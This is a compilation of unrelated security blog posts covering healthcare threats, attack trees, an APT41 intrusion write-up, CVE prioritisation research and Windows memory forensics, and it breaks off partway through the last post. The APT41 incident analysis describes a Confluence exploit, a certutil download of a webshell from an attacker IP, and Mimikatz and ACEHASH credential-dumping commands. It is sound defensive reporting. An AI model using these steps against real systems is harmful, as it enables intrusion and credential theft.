In our new report, Beyond Compliance: Cyber Threats and Healthcare, we share an update on the types of threats observed affecting healthcare organizations: from criminal targeting of patient data to less frequent – but still high impact – cyber espionage intrusions, as well as disruptive and destructive threats. We urge you to review the full report for these insights, however, these are two key areas to keep in mind.

  • Chinese espionage targeting of medical researchers: We’ve seen medical research – specifically cancer research – continue to be a focus of multiple Chinese espionage groups. While difficult to fully assess the extent, years of cyber-enabled theft of research trial data might be starting to have an impact, as Chinese companies are reportedly now manufacturing cancer drugs at a lower cost to Western firms.
  • Healthcare databases for sale under $2,000:  The sheer number of healthcare-associated databases for sale in the underground is outrageous. Even more concerning, many of these databases can be purchased for under $2,000 dollars (based on sales we observed over a six-month period).

To learn more about the types of financially motivated cyber threat activity impacting healthcare organizations, nation state threats the healthcare sector should be aware of, and how the threat landscape is expected to evolve in the future, check out the full report here, or give a listen to this podcast conversation between Principal Analyst Luke McNamara and Grady Summers, EVP, Products:

For a closer look at the latest breach and threat landscape trends facing the healthcare sector, register for our Sept. 17, 2019, webinar.

For more details around an actor who has targeted healthcare, read about our newly revealed APT group, APT41.

Define Your Unique Security Threats with These Tools

It takes only minutes from the first action of an attack with 5 or less steps for an asset to be compromised, according to the 2019 Verizon Data Breach Investigations Report (DBIR).  However, it takes days—an average of 279 days—to identify and contain a breach (Ponemon Institute). And the longer it takes to discover the source, the more money the incident ends up costing the organization.  Luckily, you can reduce your chance of falling victim to these attacks by proactively anticipating your greatest threats and taking measures to mitigate these.

This blog post breaks down two tools to help you determine just that: your most at-risk data, how this data can be accessed, and the attacker’s motives and abilities.  Once you have an understanding of these, it will be much easier to implement countermeasures to protect your organization from those attacks.

I recommend first reading through the DBIR sections pertaining to your industry in order to further your understanding of patterns seen in the principal assets being targeted and the attacker’s motives.  This will assist in understanding how to use the two tools: Method-Opportunity-Motive, by Shari and Charles Pfleeger and Attack Trees, as discussed by Bruce Schneier.

Defining Method-Opportunity-Motive:


Methods are skills, knowledge and tools available to the hacker, which are similar to Tactics, Techniques, and Procedures used by the Military and MITTR. Jose Esteves et. al. wrote, “Although it used to be common for hackers to work independently, few of today’s hackers operate alone. They are often part of an organized hacking group, where they are members providing specialized illegal services….” A hacker’s methods are improved when part of a team, which has a motive and looks for opportunities to attack principle assets.


Opportunities are the amount of time and ability required for an attacker to access their objective.  The 2019 DBIR authors’ note, “Defenders fail to stop short paths substantially more often than long paths.” It’s critical to apply the correct controls to assets and to monitor those tools in order to quickly detect threats.


The motive is the reason to attack; for instance, is the attacker trying to access financial information or intellectual property? The 2019 DBIR notes that most attacks are for financial gains or intellectual property (IP), varying by industry.

Using Attack Trees to Visually Detail Method-Opportunity-Motive:

Bruce Schneier (Schneier on Security) provides an analytics tool for systematically reviewing why and how an attack might occur. After defining what assets are most valuable to an attacker (motive), you can identify the attacker’s objective, referred to as the root node in an attack tree. From here, you can look at all the possible actions an attacker might use to compromise the primary assets (method).  The most probable and timely method shows the most likely path (opportunity).

I like using divergent and convergent thinking described by Chris Grivas and Gerard Puccio to discover plausible motive, opportunity, and methods used by a potential threat actor. Divergent thinking is the generation of ideas, using techniques like brainstorming. Convergent thinking is the limiting of ideas based on certain criteria. Using this process, you and your security team can generate objectives and then decide which objectives pose the greatest threat. You can then use this process again to determine the possible methods, referred to as leaf nodes, that could be used to access the objective. Then, you can apply values, such as time, to visualize possible opportunities and attack paths.

To further your understanding of how to create an attack tree, let’s look at an example:

1.  First, decide what primary assets your company has that an intruder is interested in accessing.

The 2019 DBIR provides some useful categories to determine attack patterns within specific industries.  For this example, let’s look at a financial institution. One likely asset that a threat actor is attempting to access is the email server, so this is our root node, or objective. Again, using divergent and convergent thinking can help a team develop and clarify possible objectives.

2.  After deciding on the objective, the second step in developing an attack tree is to define methods to access the objective.

The 2019 DBIR describes some likely methods threat actors might use, or you can use divergent and convergent thinking. In the example below, I’ve included some possible methods to access the email server.

Attack Tree Visualization

3.  As you analyze the threat, continue working through the tree and building out the methods to develop specific paths to the asset.

The diagram below shows some potential paths to access and harvest information from the email server, using OR nodes, which are alternative paths, and AND nodes, which require combined activities to achieve the objective (this is represented using ). Note that every method that isn’t an AND node is an OR node.

Attack Tree Visualization

4.  The fourth step is to apply binary values to decide what paths the attack is most likely to follow.

For example, I’m going to use likely (l) and unlikely (u) based on the methods my research has shown is available to the attacking team. Then, use a dotted line to show the all likely paths, which are those in which all methods of the path are assigned a likely value.

Attack Tree Visualization

5.  The fifth step is to apply numeric values to the sub-nodes to decide on what path, specifically, the threat actor might attempt.

I’m going to use minutes in this scenario; however, other values such as associated costs or probability of success could also be used. These are subjective values and will vary amongst teams. Paths with supporting data would provide a more accurate model, but Attack Trees are still useful even without objective data.

Attack Tree Visualization

In the above example, I have determined the path with the shortest amount of time to be phishing (credential harvesting), assuming the credentials are the same for the user accounts as they are for admin accounts. Since I have already determined that this path is likely and I now know it takes the shortest amount of time, I can determine that this is the most at-risk and likely path to accessing the email server.  In this example, the least likely path is stolen credentials.

6.  After examining the possible motives, opportunities, and methods, you can decide how you want to protect your assets.

For example, I determined that phishing is likely with the attack tree above, so I might decide to outsource monitoring, detection, and training to a Managed Security Service Provider (MSSP) that can provide this at a lower cost than an in-house staff. I might also consider purchasing software to detect, report, and prevent phishing emails, limiting the possibility of a phishing attempt. If social engineering is determined to be a concern, you could conduct end-user training, look for ways to secure the physical environment (guards, better door locks), or make the work environment more desirable (cafeteria, exercise room, recreation area, etc.)

The models discussed work together to provide ways to determine, analyze, and proactively protect against the greatest threats to your valuable assets. Ultimately, thinking through scenarios using these tools will provide a more thoughtful and cost-effective approach to security.

The post Define Your Unique Security Threats with These Tools appeared first on GRA Quantum.

GAME OVER: Detecting and Stopping an APT41 Operation

In August 2019, FireEye released the “Double Dragon” report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponzing and exploiting within a matter of days.

Our knowledge of this group’s targets and activities are rooted in our Incident Response and Managed Defense services, where we encounter actors like APT41 on a regular basis. At each encounter, FireEye works to reverse malware, collect intelligence and hone our detection capabilities. This ultimately feeds back into our Managed Defense and Incident Response teams detecting and stopping threat actors earlier in their campaigns.

In this blog post, we’re going to examine a recent instance where FireEye Managed Defense came toe-to-toe with APT41. Our goal is to display not only how dynamic this group can be, but also how the various teams within FireEye worked to thwart attacks within hours of detection – protecting our clients’ networks and limiting the threat actor’s ability to gain a foothold and/or prevent data exposure.


In April 2019, FireEye’s Managed Defense team identified suspicious activity on a publicly-accessible web server at a U.S.-based research university. This activity, a snippet of which is provided in Figure 1, indicated that the attackers were exploiting CVE-2019-3396, a vulnerability in Atlassian Confluence Server that allowed for path traversal and remote code execution.

Figure 1: Snippet of PCAP showing attacker attempting CVE-2019-3396 vulnerability

This vulnerability relies on the following actions by the attacker:

  • Customizing the _template field to utilize a template that allowed for command execution.
  • Inserting a cmd field that provided the command to be executed.

Through custom JSON POST requests, the attackers were able to run commands and force the vulnerable system to download an additional file. Figure 2 provides a list of the JSON data sent by the attacker.

Figure 2: Snippet of HTTP POST requests exploiting CVE-2019-3396

As shown in Figure 2, the attacker utilized a template located at hxxps[:]//github[.]com/Yt1g3r/CVE-2019-3396_EXP/blob/master/cmd.vm. This publicly-available template provided a vehicle for the attacker to issue arbitrary commands against the vulnerable system. Figure 3 provides the code of the file cmd.vm.

Figure 3: Code of cmd.vm, used by the attackers to execute code on a vulnerable Confluence system

The HTTP POST requests in Figure 2, which originated from the IP address 67.229.97[.]229, performed system reconnaissance and utilized Windows certutil.exe to download a file located at hxxp[:]//67.229.97[.]229/pass_sqzr.jsp and save it as test.jsp (MD5: 84d6e4ba1f4268e50810dacc7bbc3935). The file test.jsp was ultimately identified to be a variant of a China Chopper webshell.

A Passive Aggressive Operation

Shortly after placing test.jsp on the vulnerable system, the attackers downloaded two additional files onto the system:

  • 64.dat (MD5: 51e06382a88eb09639e1bc3565b444a6)
  • Ins64.exe (MD5: e42555b218248d1a2ba92c1532ef6786)

Both files were hosted at the same IP address utilized by the attacker, 67[.]229[.]97[.]229. The file Ins64.exe was used to deploy the HIGHNOON backdoor on the system. HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins. This particular variant of HIGHNOON is tracked as HIGHNOON.PASSIVE by FireEye. (An exploration of passive backdoors and more analysis of the HIGHNOON malware family can be found in our full APT41 report).

Within the next 35 minutes, the attackers utilized both the test.jsp web shell and the HIGHNOON backdoor to issue commands to the system. As China Chopper relies on HTTP requests, attacker traffic to and from this web shell was easily observed via network monitoring. The attacker utilized China Chopper to perform the following:

  • Movement of 64.dat and Ins64.exe to C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Program Files\Atlassian\Confluence
  • Performing a directory listing of C:\Users

Additionally, FireEye’s FLARE team reverse engineered the custom protocol utilized by the HIGHNOON backdoor, allowing us to decode the attacker’s traffic. Figure 4 provides a list of the various commands issued by the attacker utilizing HIGHNOON.

Figure 4: Decoded HIGHNOON commands issued by the attacker

Playing Their ACEHASH Card

As shown in Figure 4, the attacker utilized the HIGHNOON backdoor to execute a PowerShell command that downloaded a script from PowerSploit, a well-known PowerShell Post-Exploitation Framework. At the time of this blog post, the script was no longer available for downloading. The commands provided to the script – “privilege::debug sekurlsa::logonpasswords exit exit” – indicate that the unrecovered script was likely a copy of Invoke-Mimikatz, reflectively loading Mimikatz 2.0 in-memory. Per the observed HIGHNOON output, this command failed.

After performing some additional reconnaissance, the attacker utilized HIGHNOON to download two additional files into the C:\Program Files\Atlassian\Confluence directory:

  • c64.exe (MD5: 846cdb921841ac671c86350d494abf9c)
  • (MD5: a919b4454679ef60b39c82bd686ed141)

These two files are the dropper and encrypted/compressed payload components, respectively, of a malware family known as ACEHASH. ACEHASH is a credential theft and password dumping utility that combines the functionality of multiple tools such as Mimikatz, hashdump, and Windows Credential Editor (WCE).

Upon placing c64.exe and on the system, the attacker ran the command

c64.exe "9839D7F1A0 -m”

This specific command provided a password of “9839D7F1A0” to decrypt the contents of, and a switch of “-m”, indicating the attacker wanted to replicate the functionality of Mimikatz. With the correct password provided, c64.exe loaded the decrypted and decompressed shellcode into memory and harvested credentials.

Ultimately, the attacker was able to exploit a vulnerability, execute code, and download custom malware on the vulnerable Confluence system. While Mimikatz failed, via ACEHASH they were able to harvest a single credential from the system. However, as Managed Defense detected this activity rapidly via network signatures, this operation was neutralized before the attackers progressed any further.

Key Takeaways From This Incident

  • APT41 utilized multiple malware families to maintain access into this environment; impactful remediation requires full scoping of an incident.
  • For effective Managed Detection & Response services, having coverage of both Endpoint and Network is critical for detecting and responding to targeted attacks.
  • Attackers may weaponize vulnerabilities quickly after their release, especially if they are present within a targeted environment. Patching of critical vulnerabilities ASAP is crucial to deter active attackers.

Detecting the Techniques

FireEye detects this activity across our platform, including detection for certutil usage, HIGHNOON, and China Chopper.


Signature Name

China Chopper










Certutil Downloader









MD5 Hash (if applicable)















IP Address



Looking for more? Join us for a webcast on August 29, 2019 where we detail more of APT41’s activities. You can also find a direct link to the public APT41 report here.


Special thanks to Dan Perez, Andrew Thompson, Tyler Dean, Raymond Leong, and Willi Ballenthin for identification and reversing of the HIGHNOON.PASSIVE malware.

GRA Quantum Launches Comprehensive Security Services

​Global cybersecurity firm GRA Quantum announces the launch of its comprehensive offering, Scalable Security Suite, providing solutions based on a combination of Managed Security Services and professional services, tailored to the specific needs of each client. Scalable Security Suite was created to give small to mid-sized organizations a running start when it comes to security, providing the same standard of security controls as large enterprises.

According to GRA Quantum’s President Tom Boyden, “Small and medium-sized firms are prime targets for cybercrime, but many don’t have the necessary resources or guidance to properly strengthen their security stance.  Our Scalable Security Suite is designed to help these organizations prioritize their greatest vulnerabilities and provide them a security solution that aligns with their business needs and evolves as these needs and the threat landscapes change.”

Managed Security Services (MSS), launched in December 2018, is the foundation of Scalable Security Suite. Through comprehensive security assessments, GRA Quantum experts identify vulnerabilities and provide recommendations for a custom combination of professional service offerings to best address these vulnerabilities. Professional services can be added to Managed Security Services to overcome vulnerabilities and build a more comprehensive, proactive security program.

Jen Greulich, GRA Quantum’s Director of Managed Security Services, has seen the need arise among current MSS clients for these supplemental services.  “Oftentimes, it becomes clear in a scoping call that clients’ needs extend beyond what we offer through MSS. Our new flexible offering allows us to work with the clients to develop a custom security solution for them that compliments MSS — whether they need incident response or penetration testing services.”

Aligned with GRA Quantum’s mission, Scalable Security Suite goes beyond the ordinary cyber assessment to understand and remediate acute physical and human-centric vulnerabilities as well.

To learn more about Scalable Security Suite, visit us on our website or begin to build your cybersecurity strategy with The Complete Guide to Building a Cybersecurity Strategy from Scratch.

The post GRA Quantum Launches Comprehensive Security Services appeared first on GRA Quantum.

Showing Vulnerability to a Machine: Automated Prioritization of Software Vulnerabilities


If a software vulnerability can be detected and remedied, then a potential intrusion is prevented. While not all software vulnerabilities are known, 86 percent of vulnerabilities leading to a data breach were patchable, though there is some risk of inadvertent damage when applying software patches. When new vulnerabilities are identified they are published in the Common Vulnerabilities and Exposures (CVE) dictionary by vulnerability databases, such as the National Vulnerability Database (NVD).

The Common Vulnerabilities Scoring System (CVSS) provides a metric for prioritization that is meant to capture the potential severity of a vulnerability. However, it has been criticized for a lack of timeliness, vulnerable population representation, normalization, rescoring and broader expert consensus that can lead to disagreements. For example, some of the worst exploits have been assigned low CVSS scores. Additionally, CVSS does not measure the vulnerable population size, which many practitioners have stated they expect it to score. The design of the current CVSS system leads to too many severe vulnerabilities, which causes user fatigue. ­

To provide a more timely and broad approach, we use machine learning to analyze users’ opinions about the severity of vulnerabilities by examining relevant tweets. The model predicts whether users believe a vulnerability is likely to affect a large number of people, or if the vulnerability is less dangerous and unlikely to be exploited. The predictions from our model are then used to score vulnerabilities faster than traditional approaches, like CVSS, while providing a different method for measuring severity, which better reflects real-world impact.

Our work uses nowcasting to address this important gap of prioritizing early-stage CVEs to know if they are urgent or not. Nowcasting is the economic discipline of determining a trend or a trend reversal objectively in real time. In this case, we are recognizing the value of linking social media responses to the release of a CVE after it is released, but before it is scored by CVSS. Scores of CVEs should ideally be available as soon as possible after the CVE is released, while the current process often hampers prioritization of triage events and ultimately slows response to severe vulnerabilities. This crowdsourced approach reflects numerous practitioner observations about the size and widespread nature of the vulnerable population, as shown in Figure 1. For example, in the Mirai botnet incident in 2017 a massive number of vulnerable IoT devices were compromised leading to the largest Denial of Service (DoS) attack on the internet at the time.

Figure 1: Tweet showing social commentary on a vulnerability that reflects severity

Model Overview

Figure 2 illustrates the overall process that starts with analyzing the content of a tweet and concludes with two forecasting evaluations. First, we run Named Entity Recognition (NER) on tweet contents to extract named entities. Second, we use two classifiers to test the relevancy and severity towards the pre-identified entities. Finally, we match the relevant and severe tweets to the corresponding CVE.

Figure 2: Process overview of the steps in our CVE score forecasting

Each tweet is associated to CVEs by inspecting URLs or the contents hosted at a URL. Specifically, we link a CVE to a tweet if it contains a CVE number in the message body, or if the URL content contains a CVE. Each tweet must be associated with a single CVE and must be classified as relevant to security-related topics to be scored. The first forecasting task considers how well our model can predict the CVSS rankings ahead of time. The second task is predicting future exploitation of the vulnerability for a CVE based on Symantec Antivirus Signatures and Exploit DB. The rationale is that eventual presence in these lists indicates not just that exploits can exist or that they do exist, but that they also are publicly available.

Modeling Approach

Predicting the CVSS scores and exploitability from Twitter data involves multiple steps. First, we need to find appropriate representations (or features) for our natural language to be processed by machine learning models. In this work, we use two natural language processing methods in natural language processing for extracting features from text: (1) N-grams features, and (2) Word embeddings. Second, we use these features to predict if the tweet is relevant to the cyber security field using a classification model. Third, we use these features to predict if the relevant tweets are making strong statements indicative of severity. Finally, we match the severe and relevant tweets up to the corresponding CVE.

N-grams are word sequences, such as word pairs for 2-gram or word triples for 3-grams. In other words, they are contiguous sequence of n words from a text. After we extract these n-grams, we can represent original text as a bag-of-ngrams. Consider the sentence:

A criticial vulnerability was found in Linux.

If we consider all 2-gram features, then the bag-of-ngrams representation contains “A critical”, “critical vulnerability”, etc.

Word embeddings are a way to learn the meaning of a word by how it was used in previous contexts, and then represent that meaning in a vector space. Word embeddings know the meaning of a word by the company it keeps, more formally known as the distribution hypothesis. These word embedding representations are machine friendly, and similar words are often assigned similar representations. Word embeddings are domain specific. In our work, we additionally train terminology specific to cyber security topics, such as related words to threats are defenses, cyberrisk, cybersecurity, threat, and iot-based. The embedding would allow a classifier to implicitly combine the knowledge of similar words and the meaning of how concepts differ. Conceptually, word embeddings may help a classifier use these embeddings to implicitly associate relationships such as:

device + infected = zombie

where an entity called device has a mechanism applied called infected (malicious software infecting it) then it becomes a zombie.

To address issues where social media tweets differ linguistically from natural language, we leverage previous research and software from the Natural Language Processing (NLP) community. This addresses specific nuances like less consistent capitalization, and stemming to account for a variety of special characters like ‘@’ and ‘#’.

Figure 3: Tweet demonstrating value of identifying named entities in tweets in order to gauge severity

Named Entity Recognition (NER) identifies the words that construct nouns based on their context within a sentence, and benefits from our embeddings incorporating cyber security words. Correctly identifying the nouns using NER is important to how we parse a sentence. In Figure 3, for instance, NER facilitates Windows 10 to be understood as an entity while October 2018 is treated as elements of a date. Without this ability, the text in Figure 3 may be confused with the physical notion of windows in a building.

Once NER tokens are identified, they are used to test if a vulnerability affects them. In the Windows 10 example, Windows 10 is the entity and the classifier will predict whether the user believes there is a serious vulnerability affecting Windows 10. One prediction is made per entity, even if a tweet contains multiple entities. Filtering tweets that do not contain named entities reduces tweets to only those relevant to expressing observations on a software vulnerability.

From these normalized tweets, we can gain insight into how strongly users are emphasizing the importance of the vulnerability by observing their choice of words. The choice of adjective is instrumental in the classifier capturing the strong opinions. Twitter users often use strong adjectives and superlatives to convey magnitude in a tweet or when stressing the importance of something related to a vulnerability like in Figure 4. This magnitude often indicates to the model when a vulnerability’s exploitation is widespread. Table 1 shows our analysis of important adjectives that tend to indicate a more severe vulnerability.

Figure 4: Tweet showing strong adjective use

Table 1: Log-odds ratios for words correlated with highly-severe CVEs

Finally, the processed features are evaluated with two different classifiers to output scores to predict relevancy and severity. When a named entity is identified all words comprising it are replaced with a single token to prevent the model from biasing toward that entity. The first model uses an n-gram approach where sequences of two, three, and four tokens are input into a logistic regression model. The second approach uses a one-dimensional Convolutional Neural Network (CNN), comprised of an embedding layer, a dropout layer then a fully connected layer, to extract features from the tweets.

Evaluating Data

To evaluate the performance of our approach, we curated a dataset of 6,000 tweets containing the keywords vulnerability or ddos from Dec 2017 to July 2018. Workers on Amazon’s Mechanical Turk platform were asked to judge whether a user believed a vulnerability they were discussing was severe. For all labeling, multiple users must independently agree on a label, and multiple statistical and expert-oriented techniques are used to eliminate spurious annotations. Five annotators were used for the labels in the relevancy classifier and ten annotators were used for the severity annotation task. Heuristics were used to remove unserious respondents; for example, when users did not agree with other annotators for a majority of the tweets. A subset of tweets were expert-annotated and used to measure the quality of the remaining annotations.

Using the features extracted from tweet contents, including word embeddings and n-grams, we built a model using the annotated data from Amazon Mechanical Turk as labels. First, our model learns if tweets are relevant to a security threat using the annotated data as ground truth. This would remove a statement like “here is how you can #exploit tax loopholes” from being confused with a cyber security-related discussion about a user exploiting a software vulnerability as a malicious tool. Second, a forecasting model scores the vulnerability based on whether annotators perceived the threat to be severe.

CVSS Forecasting Results

Both the relevancy classifier and the severity classifier were applied to various datasets. Data was collected from December 2017 to July 2018. Most notably 1,000 tweets were held-out from the original 6,000 to be used for the relevancy classifier and 466 tweets were held-out for the severity classifier. To measure the performance, we use the Area Under the precision-recall Curve (AUC), which is a correctness score that summarizes the tradeoffs of minimizing the two types of errors (false positive vs false negative), with scores near 1 indicating better performance.

  • The relevancy classifier scored 0.85
  • The severity classifier using the CNN scored 0.65
  • The severity classifier using a Logistic Regression model, without embeddings, scored 0.54

Next, we evaluate how well this approach can be used to forecast CVSS ratings. In this evaluation, all tweets must occur a minimum of five days ahead of CVSS scores. The severity forecast score for a CVE is defined as the maximum severity score among the tweets which are relevant and associated with the CVE. Table 1 shows the results of three models: randomly guessing the severity, modeling based on the volume of tweets covering a CVE, and the ML-based approach described earlier in the post. The scoring metric in Table 2 is precision at top K using our logistic regression model. For example, where K=100, this is a way for us to identify what percent of the 100 most severe vulnerabilities were correctly predicted. The random model would predicted 59, while our model predicted 78 of the top 100 and all ten of the most severe vulnerabilities.

Table 2: Comparison of random simulated predictions, a model based just on quantitative features like “likes”, and the results of our model

Exploit Forecasting Results

We also measured the practical ability of our model to identify the exploitability of a CVE in the wild, since this is one of the motivating factors for tracking. To do this, we collected severe vulnerabilities that have known exploits by their presence in the following data sources:

  • Symantec Antivirus signatures
  • Symantec Intrusion Prevention System signatures
  • ExploitDB catalog

The dataset for exploit forecasting was comprised of 377,468 tweets gathered from January 2016 to November 2017. Of the 1,409 CVEs used in our forecasting evaluation, 134 publicly weaponized vulnerabilities were found across all three data sources.

Using CVEs from the aforementioned sources as ground truth, we find our CVE classification model is more predictive of detecting operationalized exploits from the vulnerabilities than CVSS. Table 3 shows precision scores illustrating seven of the top ten most severe CVEs and 21 of the top 100 vulnerabilities were found to have been exploited in the wild. Compare that to one of the top ten and 16 of the top 100 from using the CVSS score itself. The recall scores show the percentage of our 134 weaponized vulnerabilities found in our K examples. In our top ten vulnerabilities, seven were found to be in the 134 (5.2%), while the CVSS scoring’s top ten included only one (0.7%) CVE being exploited.

Table 3: Precision and recall scores for the top 10, 50 and 100 vulnerabilities when comparing CVSS scoring, our simplistic volume model and our NLP model


Preventing vulnerabilities is critical to an organization’s information security posture, as it effectively mitigates some cyber security breaches. In our work, we found that social media content that pre-dates CVE scoring releases can be effectively used by machine learning models to forecast vulnerability scores and prioritize vulnerabilities days before they are made available. Our approach incorporates a novel social sentiment component, which CVE scores do not, and it allows scores to better predict real-world exploitation of vulnerabilities. Finally, our approach allows for a more practical prioritization of software vulnerabilities effectively indicating the few that are likely to be weaponized by attackers. NIST has acknowledged that the current CVSS methodology is insufficient. The current process of scoring CVSS is expected to be replaced by ML-based solutions by October 2019, with limited human involvement. However, there is no indication of utilizing a social component in the scoring effort.

This work was led by researchers at Ohio State under the IARPA CAUSE program, with support from Leidos and FireEye. This work was originally presented at NAACL in June 2019, our paper describes this work in more detail and was also covered by Wired.

UPDATE: ACSC confirms potential exploitation of BlueKeep vulnerability

Thousands of Australian businesses using older Windows systems should immediately install a patch to avoid being compromised. The Australian Signals Directorate (ASD) is aware of malicious activity that indicates potential widespread abuse of the BlueKeep vulnerability known as CVE-2019-0708, affecting older versions of Windows operating systems including the Windows Vista, Windows 7, Windows XP, Server 2003 and Server 2008 operating systems.

Finding Evil in Windows 10 Compressed Memory, Part Three: Automating Undocumented Structure Extraction

This is the final post in the three-part series: Finding Evil in Windows 10 Compressed Memory. In the first post (Volatility and Rekall Tools), the FLARE team introduced updates to both memory forensic toolkits. These updates enabled these open source tools to analyze previously inaccessible compressed data in memory. This research was shared with the community at the 2019 SANS DFIR Austin conference and is available on GitHub (Volatility and Rekall). In the second post (Virtual Store Deep Dive), we looked at the structures and algorithms involved in locating and extracting compressed pages from the Store Manager. The post included a walkthrough of a memory dump designed for analysts to be able to recreate in their own Windows 10 environments. The structures referenced in the walkthrough were all previously analyzed in a disassembler, a manual effort which came in at around eight hours. As you’d expect, this task quickly became a candidate for automation. Our analysis time is now under two minutes!

This final post accompanies my and Dimiter Andonov's BlackHat USA 2019 talk with the series title and seeks to describe the challenges faced in maintaining software that ultimately relies on undocumented structures. Here we introduce a solution to reduce the level of effort of analyzing undocumented structures.


Undocumented structures within the Windows kernel are always subject to change. The flexibility granted by not publicizing a structure’s composition can be invaluable to a development team. It can allow for the system to grow unencumbered by the need to update helper functions and public documentation. In many cases, even when a publicly available API designed to access the undocumented structures can be leveraged on a live system, incident responders and memory forensic analysts don’t have the luxury of utilizing them. DFIR analysts operating on memory extractions or snapshots ultimately using tools which must recreate the job of an API by manually parsing and traversing structures and reimplementing algorithms used.

Unfortunately, these structures and algorithms are not always up to date in the analysts’ toolkit, leading to incomplete extractions or completely broken investigations. These tools may cease to work after any given update. This is the case with the Windows kernel’s Store Manager component. Structures relied on to locate compressed data in RAM are constantly evolving. This requires some flexibility built into the plugins and a means of reducing the analysis time required to reconstruct these structures.

Leveraging flare-emu

To ease my Store Manager analysis efforts, I looked into Tom Bennett’s flare-emu utility. flare-emu can be viewed as the marriage of IDA Pro with the Unicorn emulation engine. The original use of the framework was to clean up Objective-C function call names due to ambiguity stemming from the unknown id argument for calls to objc_msgSend. Tom was able to use emulation to resolve the ambiguity and clean up his analysis environment. The value I saw in the framework was that the barrier to entry for using Unicorn was now lowered to a point where it could be used to rapidly prototype ideas. flare-emu handles PE loading, memory faults, and function calls while guaranteeing traversal over code you would like to reach.

After analyzing a dozen Windows 10 kernels, I had become familiar enough with the process to begin automating the effort. The automation of undocumented structures and algorithms requires one or more of the following properties to remain constant across builds.

  • Structure locations
  • Function prototypes
  • Order of structure memory access
  • Structure field usage
  • Callstacks

Let’s explore the example of locating the offset of ST_DATA_MGR.wCompressionFormat. As shown in Figure 1, this field is the first argument to RtlDecompressBufferEx. This function is publicly available and documented. This is how we originally derived that offset 0x220 in the ST_DATA_MGR structure corresponded to the compression format of the store page in Windows 10 1703 (x86).

Figure 1: Call to RtlDecompressBuferEx, note that the compression format originates from ST_DATA_MGR

To leverage flare-emu in automating the extraction of the value 0x220, we have a few options. For example, from analysis of other kernels, we know that the access to ST_DATA_MGR immediately before decompression is likely to be the compression format. In this case, a stronger extraction algorithm can be leveraged by prepopulating ST_DATA_MGR with a known pattern (see Figure 2).

Figure 2: Known pattern copied into ST_DATA_MGR buffer

Using flare-emu, we emulate the function in which this call is located and examine the stack post-emulation.







Figure 3: Post-emulation stack layout

Knowing that the wCompressionFormat argument originated from the ST_DATA_MGR structure, we see that it is now “Km”. If we were to search for that value in the known pattern, we would find that it begins at offset 0x220. Check out Figure 4 to see how we can leverage flare-emu to solve this challenge.

Figure 4: Code snippet from w10deflate_auto project demonstrating the automation of wCompressionFormat

The decorators preceding the function signify that the extraction algorithm will work on both 32-bit and 64-bit architectures. After generating a known pattern using a helper function within my project, flare-emu is used to allocate a buffer, storing a pointer to it in lp_stdatamgr. The pointer is written into the ECX register because I know that the first argument to the parent function, StDmSinglePageCopy is the pointer to the ST_DATA_MGR structure. The pHook function populates ECX prior to the emulation run. The helper function locate_call_in_fn is usedto perform a relaxed search for RtlDecompressBufferEx within StDmSinglePageCopy. Using flare-emu’s iterate function, I force emulation to reach decompression, at which point I read the first item on the stack and then search for it within my known pattern.

Techniques like the one described above are ultimately used to retrieve all structure fields involved in the page decompression and can be leveraged in other situations in which an undocumented structure may need tracking across Windows builds. Figure 5 shows the automation utility extracting the fields of the undocumented structures used by the Volatility and Rekall plugins.

Figure 5: Output of automation from within IDA Pro

Keeping Volatility and Rekall Updated

The data generated by the automation script is primarily useful when implemented in Volatility and Rekall. In both Volatility and Rekall, the overlay contains all structure definitions needed for page location and decompression. Figure 6 shows a snippet from the file in which the Windows 10 1903 x86 profile is created.

Figure 6: Structure definition found within overlay

Create a new profile dictionary (ex. win10_mem_comp_x86_1903) corresponding to the Windows build that you are targeting and populate the structure entries accordingly.


Undocumented structures pose a challenge to those who rely on them. This blog post covered how flare-emu can be leveraged to reduce the level of effort needed to analyze new files. We analyzed the extraction of an ST_DATA_MGR field used in page decompression by presenting the problem and then the code involved with automating the effort. The automation code is available on the FireEye GitHub with usage information and documentation available in both the README and code.

Finding Evil in Windows 10 Compressed Memory, Part Two: Virtual Store Deep Dive


This blog post is the second in a three-part series covering our Windows 10 memory forensics research and it coincides with our BlackHat USA 2019 presentation. In Part One of the series, we covered the integration of the research in both Volatily and Rekall memory forensics tools. We demonstrated that forensic artifacts (including reflectively loaded malware) could remain undiscovered without the FLARE research integration on Windows 10 (available on GitHub at win10_volatility and win10_rekall).

In this post, we demonstrate how to retrieve a compressed page using the structures and algorithms described in our white paper. We track down a compressed page in memory, beginning at its virtual address within a known process. A WinDbg kernel debugger setup is used in this walkthrough, but a similar process could be followed from within a memory snapshot or extraction using Volatility or Rekall.

Finding a Compressed Page

The operating system used in this demo is Windows 10.0.15063.0 (x64) and the structure definitions shown will be applicable across any 1703 build. Note that the two global offsets nt!SmGlobals and nt!MmPagingFile will need to be located for each revision. The process of retrieving these global offsets is described further in our white paper.

To begin analysis, we create a marker page and flush it to the Virtual Store. This can be done in several ways, the easiest of which is allocating memory in a memory constrained virtual machine.  A simple utility (ram_eater.exe) was created to perform this task. The ram_eater utility allocates and writes a marker page, and then repeatedly allocates more memory in user-specified page amounts. In a memory constrained virtual machine (1 GB RAM), the marker page will become stale shortly and be evicted to the virtual store. In Figure 1, ram_eater reports that it has allocated the marker page at address 0x2a368480000. The marker page we used (see Figure 2) was a string beginning with “CC WAS HERE!”.

Figure 1: Allocating a marker page using ram_eater_x64.exe

We can verify the contents of our marker page by locating it in the kernel debugger, viewing its Page Table Entry (PTE) and dumping its corresponding physical memory (see Figure 2). We use the !process extension to locate ram_eater’s EPROCESS structure and switch into the context of the ram_eater process. This ensures that we traverse the correct process-specific page tables for the ram_eater process. Using the page frame number (pfn) described by the hardware PTE, we dump the physical memory to validate the contents of our marker page. Page frame numbers do not include the low-order bits used to specify an offset into a page, therefore they must be multiplied by PAGE_SIZE (0x1000) to identify the actual address of the data.

Figure 2: Locating and viewing the marker page from the kernel debugger

After allocating additional memory using ram_eater, we check to see if the marker page has been sent to the virtual store. Each entry in the output of the !vm extension can be treated as an index in to nt!MmPagingFile (see Figure 3).

